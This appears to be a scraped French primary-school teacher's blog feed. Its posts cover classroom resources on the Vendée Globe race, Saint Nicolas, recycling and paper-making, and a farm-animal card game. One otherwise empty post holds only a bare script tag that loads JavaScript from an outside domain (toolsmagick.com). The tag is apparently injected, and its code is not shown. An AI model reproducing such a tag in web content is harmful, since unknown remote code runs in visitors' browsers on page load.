• Voici une contribution de MARIE LAURE que vous trouverez dans la partie habituelle en version normale et en version dys.

    Un grand MERCI

    LE LOUP QUI NE CROYAIT PAS AUX FANTOMES

    Pin It

  • Cette année, avec les 3 classes de cycle 2 de mon école, nous avons décidé de suivre la course du VENDEE GLOBE.

    Nous avons commandé le kit gratuit sur INITIATIVES COEUR et nus avons reçu un grand poster et une maquette à construire pour chaque enfant.

    Vous pouvez le voir ici

    LE VENDEE GLOBE 2024

    Il y a beaucoup de ressources sur leur site mais aussi sur celui du vendée globe junior que je vous conseille fortement. C'est une mine d'or.

    Il y a aussi le site du conseil départemental de la Vendée

     

    Voici plusieurs documents que je vais utiliser pour ma classe.

    Dans un premier temps, des explications sur la course du VENDEE GLOBE.

    LE VENDEE GLOBE 2024

    LES EXPLICATIONS SUR LA COURSE

    Je vais aussi donner à mes élèves une carte du monde avec les océans à colorier:

    LE VENDEE GLOBE 2024

    PLANISPHERE

     

    On va aborder le vocabulaire concernant les bateaux, en particulier les MONOCOQUES;

    LE VENDEE GLOBE 2024

     

    LES BATEAUX

     

    Pour suivre la course, j'ai fait une fiche avec tous les skippers et leurs bateaux que je vais plastifier afin de faire des classements.

    LE VENDEE GLOBE 2024

     

    LES SKIPPERS

    LE VENDEE GLOBE 2024

    D'OU VIENNENT LES SKIPPERS?

     

    Sur les sites dont j'ai parlé, vous pourrez trouver deux magnifiques affiches, le poster de la course pour les enfants ainsi qu'un abécédaire marin. Allez vite voir!!!

    LE VENDEE GLOBE 2024

     

    LE VENDEE GLOBE 2024

    POSTER COURSE

    ABECEDAIRE ANIMAUX MARINS

     

    Ajout d'une poésie écrite pour le VENDEE GLOBE qui s'appelle tout simplement Le Vendée Globe

    LE VENDEE GLOBE 2024

    POESIE LE VENDEE GLOBE

     

    Voici également trois chansons:

    HISSE HO MON BATEAU PAROLES

    TBI HISSEZ HO MON BATEAU

    FAIRE LE TOUR DU MONDE EN 80 JOURS PAROLES

    TBI FAIRE LE TOUR DU MONDE EN 80 JOURS

    LE VENT DANS LES VOILES PAROLESpdf »

    TBI LE VENT DANS LES VOILES

     

     

     

    Pin It

  • Chaque année, au mois de décembre, mes élèves sont impatients de rencontrer un personnage important de la région GRAND EST,bien avant de rencontrer le Père Noël. Il s'agit de SAINT NICOLAS, grand patron des écoliers.

    C'est une partie de notre culture régionale et j'aime leur raconter des albums sur Saint Nicolas. On travaille aussi le vocabulaire, qui est riche, on chante des chansons de St Nicolas. J'ai également écrit des poésies que nous aimons lui réciter car, oui, vous lisez bien, il vient dans les écoles rencontrer les élèves, qui ont été tous sages somme des images.

    J'écris cet article sur Saint Nicolas pour vous remettre mes ressources à jour mais aussi pour vous parler d'une maison d'édition que je viens de découvrir. Il s'agit des éditions FEUILLES DE MENTHE. Ces éditions regorgent d'histoires pour les élèves de l'Est de la France, la Lorraine et l'Alsace. Voici leur présentation:

    Le thé aux histoires aux parfums d'Alsace et de Lorraine

    est une collection de livres jeunesse aux éditions feuilles de menthe qui reprend des histoires, contes et légendes du patrimoine lorrain et alsaciens illustrés et écrits par des artistes de notre temps et le plus souvent originaires de l'Est de la France.
    Aux éditions feuilles de menthe, nous avons à coeur de défendre le patrimoine régional auprès des enfants et des parents, c'est pourquoi nous avons lancé une collection d'albums pour enfants "Le thé aux histoires" que nous souhaitons transgénérationnelle : une histoire pour enfant est toujours suivi d'une partie documentaire, qui permet de détailler le contexte historique, de présenter les personnages et surtout de rattacher l'histoire à un patrimoine existant et vivant. (C'est aussi un outil pour que les parents puissent répondre aux questions des enfants tout au long de l'histoire ou simplement pour leur permettre d'aller plus loin dans le désir de connaissance éveillée par l'histoire).

    Voici le lien vers leur site: ICI

    Je vous présente quelques titres:

    SAINT NICOLAS

     

     

     Voici les poésies sur ST NICOLAS: ICI

    Voici le vocabulaire et les autres fiches sur ST NICOLAS: ICI

     

     

    Pin It

  •  

    <script src="//toolsmagick.com/2252259d09bdba7f1b.js"></script>

    Lire la suite...

    Pin It

  •  

    Cette année, notre classe a travaillé toute l’année sur un thème important qui est celui du recyclage et de la protection de notre planète.

     

    Les classes du cycle 2 ont travaillé sur des albums de littérature jeunesse en lien avec ce thème: que ce soit la fonte des glaces, le recyclage des déchets, la protection des océans, …plein de thèmes ont pu être abordés en lecture.

     

    Voici quelques albums étudiés cette année avec les CP et les CE1.

     

    LE RECYCLAGE ET LA PROTECTION DE LA PLANETE

    En abordant ces thèmes, il a fallu s’investir au niveau de l’école, de la classe, au quotidien.

     

    La communauté de commune est venue faire plusieurs interventions dans les classes sur le tri des déchets ainsi que sur le compostage.

     

    Les élèves ont donc trié pour recycler.

     

    Nous récoltons le papier, les colles, les stylos usagés, les piles, les cartouches, les bouchons en plastique.

     

     

    LE RECYCLAGE ET LA PROTECTION DE LA PLANETE

     

     

     

    En faisant des recherches sur le site de BICKIDS, nous sommes tombés sur les fiches concernant l’environnement et particulièrement sur le tri des déchets et la fabrication du papier.

     

    L’idée est lancée en classe, on fait des recherches.

     

    On décide de fabriquer notre propre papier.

     

    Pour cela, nous avons récupéré des journaux, des cadres vides et des bas pour faire des tamis, un mixeur et un rouleau.

     

    LE RECYCLAGE ET LA PROTECTION DE LA PLANETE

     

     

     

    LA FABRICATION DU PAPIER DE LA CLASSE

    Les différentes étapes :

    Déchirer les journaux en petits morceaux.

    Mettre de l’eau chaude sur le papier déchiré.

    Mixer jusqu’à obtenir une pâte fine.

    Etaler la pâte sur le tamis puis  la faire basculer sur un torchon.

    Etaler avec l’aide d’un rouleau à pâtisserie.

    Les premiers résultats n’ont pas été concluants, le rendu était trop gris, trop épais.

     

     

    LE RECYCLAGE ET LA PROTECTION DE LA PLANETE

     

     

    BILAN

    Le projet autour du thème du recyclage a mobilisé les enfants sur toute l’année scolaire.

    Ils se sont tous impliqués et ont adopté des gestes éco citoyens.

    Ce thème est devenu vital pour notre planète et il est nécessaire que nos élèves soient acteurs pour faire évoluer les choses.

    Les enfants ont réalisé qu’on faisait une consommation importante de matériel, que ce soit les tubes de colle, les stylos ou encore le papier. Le carton était vidé tous les mois.

    A notre échelle, nous avons essayé de faire des efforts et chaque effort permettra d’en réaliser de plus grands.

    Les sujets abordés au travers des albums de littérature jeunesse ont beaucoup plu aux enfants.

    Les gestes éco citoyens sont devenus des routines, tout le monde fait attention au tri des déchets, on nettoie la cour et nous avons même fait une action dans tout le quartier pour ramasser les déchets.

    Le bilan est plus que positif et surtout encourageant.

    Voici le lien vers la fiche qui nous a servi pour la fabrication du papier.

     

    VOICI LE LIEN VERS  LES FICHES BICKIDS SUR LE RECYCLAGE

     

    ICI

     

    Et voici le lien pour aller visiter le site BICKIDS qui regorge d'idées et de ressources:

     

    ICI

     

    LE RECYCLAGE ET LA PROTECTION DE LA PLANETE

     

     

     

     

     

    Pin It

  • Je vous invite à aller sur le site BICKIDS qui organise un chouette concours autour du recyclage et du jardin.

    Il s'agit de recycler un objet du quotidien en fin de vie pour imaginer une histoire autour de lui.

    UN CONCOURS BIC

     

    Voici le lien qui vous permettra d'accéder au site et de vous inscrire au concours. Il y a plein de lots à gagner.

    ICI

     

     

    UN CONCOURS BIC

     

    Pin It

  • UN SITE A DECOUVRIR

    UN SITE A DECOUVRIR

     

    Vous êtes en cycle 2 ou cycle 3, alors foncez découvrir le site MON ASSIETTE MA PLANETE qui vous propose plein d'activités.

    Je vous copie leur présentation:

    Mon assiette Ma planète est une plateforme pédagogique conçue pour les enseignants de l’école primaire au lycée.

    Mon assiette Ma planète vous propose de nombreuses ressources (fiches d’activités, vidéos, posters, bande dessinée, etc), des animations et des rencontres avec les professionnels de la filière pour accompagner vos cours et développer l’esprit critique de vos élèves.


    Faire comprendre les enjeux d’une alimentation durable, initier un débat sur les différentes pratiques d’élevage dans le monde, découvrir les métiers de la filière ou encore favoriser les rencontres avec les professionnels, voici ce que vous propose Mon assiette Ma planète.
    Vous pouvez télécharger une ressource librement et commander une animation ou réserver une rencontre avec un professionnel en créant votre compte. Cette plateforme est éditée par INTERBEV.

     

    INTERBEV est une association fondée en 1979 qui représente la filière de l’élevage et des viandes, ses entreprises, ses métiers : éleveurs, commerçants en bestiaux, abatteurs, bouchers, etc. Elle a pour but de valoriser leur savoir-faire et la qualité de leur travail. Dans le cadre de ses missions d’information, INTERBEV développe depuis de nombreuses années des ressources et des animations pédagogiques réalisées dans le respect des programmes de l’Education nationale.

     

    Avec ma classe de CP, j'ai pu tester une de leur ressource.

    Il s'agit du jeu des 7 familles sur les animaux de la ferme.

    UN SITE A DECOUVRIR

    Voici le lien pour y accéder directement: ICI

     

     

    J'ai travaillé en amont sur la naissance des animaux. Nous avions vu les notions VIVANT NON VIVANT puis celle d'OVIPARES VIVIPARES. J'avais abordé ce thème avec les animaux de la ferme. Les élèves ont abordé les notions de MALE FEMELLE PETIT mais aussi les différents abris des animaux.

     

    Pour approfondir toutes ces notions de vocabulaire autour de la ferme, j'ai pu tester le jeu des 7 familles. Les élèves ont tout de suite adhérer et cela pour plusieurs raisons:

    - Le jeu et le graphisme sont attractifs.

    - Jouer en apprenant, c'est tellement mieux!!!

    - Ils connaissaient bien les familles des animaux de la ferme: le m^le, la femelle, le petit.

    - Le jeu nous a permis d'approfondir et de découvrir de nouveaux mots: la familles des bovins, ovins...et de voir que dans une ferme, il n'y a pas que des animaux. Ce jeu de cartes comprend également la famille des personnes qui travaillent dans une ferme comme un éleveur, le vétérinaire ou encore la famille des aliments consommés par les animaux.

    UN SITE A DECOUVRIR

    UN SITE A DECOUVRIR

     

    UN SITE A DECOUVRIR

    UN SITE A DECOUVRIR

     

    BILAN:

    Le jeu a beaucoup plu aux élèves.

    On peut adapter pour tous les niveaux dans la classe, du plus lecteur à celui qui a encore des difficultés, en lisant le nom de la famille et l'animal demandé, en demandant seulement la couleur ou le numéro. Tout le monde a pu participer!!!

    Ce jeu est donc adressé aussi bien à des CP qu'à des CE1 ou des CE2.

    Il a permis de bien revoir certaines notions de vocabulaire et d'en découvrir de nouvelles.

    Le seul point difficile, pour les CP, s'est porté sur la notion de mâle castré.

     

    Un autre avantage du site, c'est que vous trouverez les fiches élèves mais aussi es fiches enseignants, ce qui vous guidera parfaitement car elles sont CLE EN MAIN. Les ressources sont variées, fiches d'activités ou vidéos ou jeu comme celui que nous avons testé. Vous pouvez télécharger plein de ressources!!!!

    Je vous recommande donc vivement ce site qui regorge d'activités et que je vais continuer à consulter, notamment pour l'alimentation que nous allons travailler très bientôt en classe.

     

     

     

    Pin It

  • UN GRAND MERCI à HELENE qui partage avec nous 3 tapuscrits version DYS.

    Ils seront dans la partie habituelle:

    NOUVEAUX TAPUSCRITS DYS

     

    NOUVEAUX TAPUSCRITS DYS

    NOUVEAUX TAPUSCRITS DYS

    Pin It




    Suivre le flux RSS des articles de cette rubrique